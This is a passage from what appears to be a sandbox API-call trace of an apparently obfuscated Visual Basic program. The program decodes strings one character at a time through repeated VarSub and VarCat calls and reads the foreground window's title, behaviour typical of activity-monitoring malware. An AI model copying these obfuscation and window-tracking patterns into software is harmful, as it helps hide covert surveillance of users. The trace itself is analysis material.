lpWideCharStr="-") returned 1 [0088.935] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0088.935] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0088.936] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.936] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.937] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.937] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.938] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.939] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.939] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.940] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.940] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.941] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.941] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.942] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.942] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.942] GetForegroundWindow () returned 0x10080 [0088.942] GetLastError () returned 0x0 [0088.942] SysStringLen (param_1=" ") returned 0xff [0088.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0088.943] SysStringLen (param_1=" ") returned 0xff [0088.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0088.943] GetWindowTextA (in: hWnd=0x10080, lpString=0xe577bc, nMaxCount=255 | out: lpString="") returned 0 [0088.943] GetLastError () returned 0x0 [0088.943] SysStringByteLen (bstr=" †††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0088.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0088.943] SysStringByteLen (bstr=" †††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0088.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="") returned 256 [0088.944] SysStringLen (param_1="") returned 0x4 [0088.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=5, lpMultiByteStr=0xe57084, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 5 [0088.944] SetWindowTextA (hWnd=0x2036e, lpString="") returned 1 [0088.944] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0088.944] GetFocus () returned 0x0 [0088.944] lstrlenA (lpString="") returned 0 [0088.944] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe57084) returned 0x1 [0088.945] IsWindow (hWnd=0x2036e) returned 1 [0088.945] IsWindow (hWnd=0x2036e) returned 1 [0088.945] IsWindow (hWnd=0x2036e) returned 1 [0088.945] IsWindow (hWnd=0x2036e) returned 1 [0088.945] GetFocus () returned 0x0 [0088.946] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0088.946] GetFocus () returned 0x0 [0088.946] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1) returned 0x310bcd0 [0088.946] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x1, lParam=0x310bcd0) returned 0x0 [0088.946] GetFocus () returned 0x0 [0088.946] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0088.946] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0088.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c", lpUsedDefaultChar=0x0) returned 1 [0088.948] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0088.948] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0088.948] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0088.949] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0088.949] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0088.949] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0088.950] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0088.951] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0088.951] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0088.952] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0088.952] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0088.952] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.953] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.953] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0088.954] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0088.954] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0088.955] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0088.955] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0088.956] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0088.956] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0088.956] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0088.957] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.957] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.957] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.958] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.958] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0088.959] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0088.959] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.960] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.960] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.961] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.961] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0088.961] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0088.962] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.962] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.962] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.963] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.963] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.964] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.964] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.965] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.965] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.966] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.966] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.966] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.967] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.967] GetForegroundWindow () returned 0x102c2 [0088.967] GetLastError () returned 0x0 [0088.968] SysStringLen (param_1=" ") returned 0xff [0088.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0088.968] SysStringLen (param_1=" ") returned 0xff [0088.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0088.968] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0088.968] GetLastError () returned 0x0 [0088.968] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0088.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0088.968] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0088.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0088.969] SysStringLen (param_1="Act") returned 0x3 [0088.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Act", cchWideChar=4, 